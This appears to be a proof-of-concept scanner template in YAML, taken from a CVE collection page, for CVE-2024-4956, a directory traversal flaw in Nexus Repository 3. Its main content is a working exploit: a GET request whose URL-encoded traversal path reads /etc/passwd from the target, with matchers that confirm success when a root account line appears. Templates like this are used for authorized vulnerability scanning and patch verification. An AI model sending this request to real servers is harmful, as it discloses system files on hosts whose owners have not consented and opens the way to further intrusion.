4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2024-4956.yaml YAML
id: CVE-2024-4956

info:
  name: Directory Traversal in Nexus Repository 3 (CVE-2024-4956)
  author: erickfernandox
  reference: 
  severity: high
  tags: cve,traversal

requests:
  - method: GET
    path:
      - "{{BaseURL}}/%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
          
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body